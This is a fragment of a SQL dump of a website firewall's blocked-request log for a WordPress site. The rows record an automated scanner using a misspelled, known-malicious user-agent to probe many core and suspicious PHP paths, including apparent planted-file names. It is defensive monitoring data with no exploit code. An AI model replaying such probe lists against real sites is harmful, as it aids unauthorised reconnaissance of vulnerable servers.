User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133295,1699888655.230157,1699888655.221500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/css/','http://eckankar-colorado.org/css/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Nzcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133272,1699888667.255166,1699888667.246600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio-video.riff.php','http://eckankar-colorado.org/wp-includes/ID3/module.audio-video.riff.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8tdmlkZW8ucmlmZi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133273,1699888666.924934,1699888666.916200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3/module.audio-video.quicktime.php','http://eckankar-colorado.org/wp-includes/ID3/module.audio-video.quicktime.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEMy9tb2R1bGUuYXVkaW8tdmlkZW8ucXVpY2t0aW1lLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133291,1699888656.575770,1699888656.551100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/include/','http://eckankar-colorado.org/include/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luY2x1ZGUv\",\"category\":\"brute-force\",\"ssl\":1}'),(133296,1699888654.869712,1699888654.861100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/components/','http://eckankar-colorado.org/components/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2NvbXBvbmVudHMv\",\"category\":\"brute-force\",\"ssl\":1}'),(133289,1699888657.256587,1699888657.241900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/modules/mod_simplefileuploadv1.3/elements/','http://eckankar-colorado.org/modules/mod_simplefileuploadv1.3/elements/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21vZHVsZXMvbW9kX3NpbXBsZWZpbGV1cGxvYWR2MS4zL2VsZW1lbnRzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133290,1699888656.911416,1699888656.902800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/modules/','http://eckankar-colorado.org/modules/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21vZHVsZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(133489,1699888582.609627,1699888582.600900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/customize/class-wp-customize-header-image-control.php','http://eckankar-colorado.org/wp-includes/customize/class-wp-customize-header-image-control.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2N1c3RvbWl6ZS9jbGFzcy13cC1jdXN0b21pemUtaGVhZGVyLWltYWdlLWNvbnRyb2wucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133536,1699888563.948600,1699888563.935800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3module.tag.apetag.php','http://eckankar-colorado.org/wp-includes/ID3module.tag.apetag.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEM21vZHVsZS50YWcuYXBldGFnLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133350,1699888636.204886,1699888636.195900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/continents-cities.php','http://eckankar-colorado.org/wp-admin/includes/continents-cities.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NvbnRpbmVudHMtY2l0aWVzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133598,1699888540.451051,1699888540.442400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/meta.php','http://eckankar-colorado.org/wp-includes/meta.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL21ldGEucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133429,1699888606.297357,1699888606.288200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/network/','http://eckankar-colorado.org/wp-admin/network/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL25ldHdvcmsv\",\"category\":\"brute-force\",\"ssl\":1}'),(133380,1699888625.615940,1699888625.607000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-filesystem-ssh2.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-filesystem-ssh2.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLWZpbGVzeXN0ZW0tc3NoMi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133432,1699888604.273399,1699888604.264700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-text.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-text.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LXRleHQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133393,1699888621.226528,1699888621.217600,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-walker-category-checklist.php','http://eckankar-colorado.org/wp-admin/includes/class-walker-category-checklist.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdhbGtlci1jYXRlZ29yeS1jaGVja2xpc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133394,1699888620.893241,1699888620.884400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-theme-upgrader.php','http://eckankar-colorado.org/wp-admin/includes/class-theme-upgrader.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXRoZW1lLXVwZ3JhZGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133379,1699888626.135713,1699888626.126200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-importer.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-importer.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLWltcG9ydGVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133378,1699888626.469794,1699888626.460900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-internal-pointers.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-internal-pointers.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLWludGVybmFsLXBvaW50ZXJzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133438,1699888602.206004,1699888602.197300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-pages.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-pages.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LXBhZ2VzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133437,1699888602.545216,1699888602.536500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-recent-comments.php','http://eckankar-colorado.org/wp-includes/widgets/class-wp-widget-recent-comments.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMvY2xhc3Mtd3Atd2lkZ2V0LXJlY2VudC1jb21tZW50cy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133430,1699888605.958768,1699888605.950000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/meta/','http://eckankar-colorado.org/wp-admin/meta/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL21ldGEv\",\"category\":\"brute-force\",\"ssl\":1}'),(133565,1699888552.785392,1699888552.776100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sitemaps.php','http://eckankar-colorado.org/wp-includes/sitemaps.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NpdGVtYXBzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133557,1699888555.546290,1699888555.530500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme-templates.php','http://eckankar-colorado.org/wp-includes/theme-templates.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RoZW1lLXRlbXBsYXRlcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134298,1700049272.942855,1700049272.920200,0x00000000000000000000FFFF55728ADC,0,403,0,0,0,'https://eckankar-colorado.org/admin-heade.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluLWhlYWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134295,1700046072.010108,1700046071.987800,0x00000000000000000000FFFF5B5CFCA2,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/include.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pbmNsdWRlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133514,1699888572.524705,1699888572.515800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/SimplePie/Exception.php','http://eckankar-colorado.org/wp-includes/SimplePie/Exception.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie 